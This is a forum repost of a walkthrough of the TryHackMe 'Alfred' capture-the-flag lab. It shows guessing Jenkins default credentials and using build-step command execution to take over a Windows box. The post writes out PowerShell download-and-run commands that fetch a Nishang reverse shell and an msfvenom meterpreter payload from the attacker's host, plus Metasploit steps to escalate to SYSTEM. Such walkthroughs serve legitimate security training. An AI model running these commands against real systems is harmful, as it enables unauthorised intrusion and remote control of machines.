+- Sick Gaming (https://www.sickgaming.net)
+-- Forum: Programming (https://www.sickgaming.net/forum-76.html)
+--- Forum: Python (https://www.sickgaming.net/forum-83.html)
+--- Thread: [Tut] TryHackMe Alfred – How I Solved The Challenge [+Video] (/thread-100489.html)
[Tut] TryHackMe Alfred – How I Solved The Challenge [+Video] - xSicKxBot - 12-28-2022
TryHackMe Alfred – How I Solved The Challenge [+Video]
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1000191","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-alfred-how-i-solved-the-challenge/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FGkMOsGp6mco%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<p>In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY/SYSTEM, which is the equivalent of <code>root</code> on a Windows machine. </p>
<p class="has-global-color-8-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2694.png" alt="⚔" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Challenge</strong>: I need to capture two “flags”, the <code>user.txt</code> flag and the <code>root.txt</code> flag. Let’s get started!</p>
<p>First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.</p>
<h2>INITIAL ENUMERATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="956" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-315.png" alt="" class="wp-image-1000265" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-315.png 956w, https://blog.finxter.com/wp-content/uploads/2022/12/image-315-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2022/12/image-315-768x512.png 768w" sizes="(max-width: 956px) 100vw, 956px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">IPs
export myIP=10.6.2.23
export targetIP=10.10.99.176 ┌──(tester㉿box)-[~/THM]
└─$ nmap 10.10.216.90 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST
Nmap scan report for 10.10.216.90
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
</pre>
<p>We see that there are three open ports. </p>
<p>There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser. </p>
<p>The <code>ms-wbt-server</code> running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol). </p>
<p>Also, the <code>http-proxy</code> on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There’s not much here to see. A quick look at the source HTML code doesn’t reveal anything else interesting.</p>
<h2>HACKING JENKINS WITH BURPSUITE</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="955" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-317.png" alt="" class="wp-image-1000275" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-317.png 955w, https://blog.finxter.com/wp-content/uploads/2022/12/image-317-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2022/12/image-317-768x512.png 768w" sizes="(max-width: 955px) 100vw, 955px" /></figure>
</div>
<p>On port 8080, we find a login page to Jenkins.</p>
<p>Let’s take a few guesses with some of the standard factory-set passwords: <code>admin:password</code>, <code>admin:admin</code>, etc. </p>
<p>Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack. </p>
<p>Based on the different lengths of the responses, we can see that <code>admin:admin</code> may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with <code>admin:admin</code>.</p>
<p>At TryHackMe’s suggestion, we’ll use Nishang for spawning a <code>revshell</code> from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure. </p>
<p>In the last text box, we can perform remote command execution. </p>
<h2>USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="425" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-316.png" alt="" class="wp-image-1000272" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-316.png 425w, https://blog.finxter.com/wp-content/uploads/2022/12/image-316-200x300.png 200w" sizes="(max-width: 425px) 100vw, 425px" /></figure>
</div>
<p>First, let’s spawn a reverse shell using <code>PowerShellTcp.ps1</code> from <a rel="noreferrer noopener" href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" target="_blank">nishang’s git repo</a>. After downloading the file from the git repo, we launch a Netcat listener with the command: </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<p>Then we use the following command in the last text box on Jenkins project 1 settings.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1'>
</pre>
<p>After clicking on “<code>build</code>” in the Jenkin’s dashboard, we catch the shell on our Netcat listener and discover the <code>user.txt</code> flag!</p>
<pre class="wp-block-preformatted"><code>!!!
<strong>user.txt:</strong>
79007a09481963edf2e1321abd9ae2a0
!!!</code>
</pre>
<h2>USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="425" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-318.png" alt="" class="wp-image-1000279" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-318.png 425w, https://blog.finxter.com/wp-content/uploads/2022/12/image-318-200x300.png 200w" sizes="(max-width: 425px) 100vw, 425px" /></figure>
</div>
<p>We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 – encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe</pre>
<p>Now we need to start up Metasploit console:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Msfconsole</pre>
<p>Load the meterpreter exploit/multi/handler:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">use exploit/multi/handler</pre>
<p>Set up our payload:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">set payload windows/meterpreter/reverse_tcp payload</pre>
<p>And finally, type: <code>run</code></p>
<p>First, we’ll spin up a simple HTTP server to copy <code>shell.exe</code> to windows with:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -m http.server 8000</pre>
<p>Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.2.23:8000/shell.exe','shell.exe')"</pre>
<p>And Metasploit successfully launches a new meterpreter session on the target box. If the <code>shell.exe</code> file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./shell.exe</pre>
<h2>PRIVILEGE ESCALATION TO ROOT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="956" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-319.png" alt="" class="wp-image-1000292" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-319.png 956w, https://blog.finxter.com/wp-content/uploads/2022/12/image-319-300x200.png 300w, https://blog.finxter.com/wp-content/uploads/2022/12/image-319-768x512.png 768w" sizes="(max-width: 956px) 100vw, 956px" /></figure>
</div>
<p>First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getsystem</pre>
<p>We now operate with NT AUTHORITY/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine. </p>
<p>Entering the command “<code>ps</code>” will give us a list of processes. We’ll use the process <code>system.exe</code> with the following command:</p>
<p><code>migrate <PID></code> (process id of the target process running by NT AUTHORITY/SYSTEM, in this case <code>system.exe</code>)</p>
<p>Now we are running metasploit in the RAM of our target machine on the <code>system.exe</code> process. We have full NT AUTHORITY/SYSTEM privileges and can easily find <code>root.txt</code> with the following command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">find -f root.txt cat root.txt
��dff0f748678f280250f25a45b8046b4a
</pre>
<p>Thanks for reading/watching my walkthrough. <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
</div>
https://www.sickgaming.net/blog/2022/12/25/tryhackme-alfred-how-i-solved-the-challenge-video/